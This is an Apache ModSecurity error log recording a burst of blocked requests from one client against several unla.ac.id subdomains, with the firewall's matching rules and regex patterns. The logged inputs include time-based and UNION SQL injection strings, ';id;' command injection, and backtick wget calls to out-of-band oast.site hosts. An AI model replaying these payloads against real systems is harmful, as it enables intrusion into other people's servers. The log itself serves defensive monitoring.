[Tue Aug 29 11:30:17.392336 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPRNYAAAAAf"]
[Tue Aug 29 11:30:17.395678 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPOhW8AAAAa"]
[Tue Aug 29 11:30:17.403589 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlguxjr74osgfp86.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22url\\x5c\\x22:\\x5c\\x22 found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlguxjr74osgfp86.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlguxjr74osgfp86.oast.site\\x5c\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WcCo-f0AAAN5YGYAAAAN"]
[Tue Aug 29 11:30:17.415937 2023] [:error] [pid 920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAOYZhoAAAAB"]
[Tue Aug 29 11:30:17.615523 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPOhXIAAAAa"]
[Tue Aug 29 11:30:18.332958 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WsCo-f0AAAOM4U4AAAAU"]
[Tue Aug 29 11:30:19.550082 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPPStgAAAAd"]
[Tue Aug 29 11:30:19.583771 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPRNYwAAAAf"]
[Tue Aug 29 11:30:19.632286 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPPStwAAAAd"]
[Tue Aug 29 11:30:19.685840 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPRNZEAAAAf"]
[Tue Aug 29 11:30:19.686822 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAN5YHEAAAAN"]
[Tue Aug 29 11:30:20.320377 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAO873YAAAAF"]
[Tue Aug 29 11:30:20.388852 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAPXAjQAAAAi"]
[Tue Aug 29 11:30:20.425749 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAN5YHUAAAAN"]
[Tue Aug 29 11:30:20.447416 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAPRNZYAAAAf"]
[Tue Aug 29 11:30:20.570927 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAPahukAAAAL"]
[Tue Aug 29 11:30:20.580468 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10XMCo-f0AAAPRNZwAAAAf"]
[Tue Aug 29 11:30:21.312540 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XcCo-f0AAAO874IAAAAF"]
[Tue Aug 29 11:30:21.415556 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XcCo-f0AAAPfm60AAAAR"]
[Tue Aug 29 11:30:22.352292 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAOIvTQAAAAM"]
[Tue Aug 29 11:30:22.352571 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAPXAkMAAAAi"]
[Tue Aug 29 11:30:22.361493 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAOH4SEAAAAH"]
[Tue Aug 29 11:30:22.376308 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAN5YIAAAAAN"]
[Tue Aug 29 11:30:22.486862 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgfga85j6egs71t.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAPahu0AAAAL"]
[Tue Aug 29 11:30:22.519211 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgh5p1z6sc96swa.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAOIvTUAAAAM"]
[Tue Aug 29 11:30:22.631187 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgtci446cof9g79.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAPahu8AAAAL"]
[Tue Aug 29 11:30:22.632289 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlge8oo4gtoqg7hj.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAOIvTYAAAAM"]
[Tue Aug 29 11:30:22.684067 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAPGfroAAAAV"]
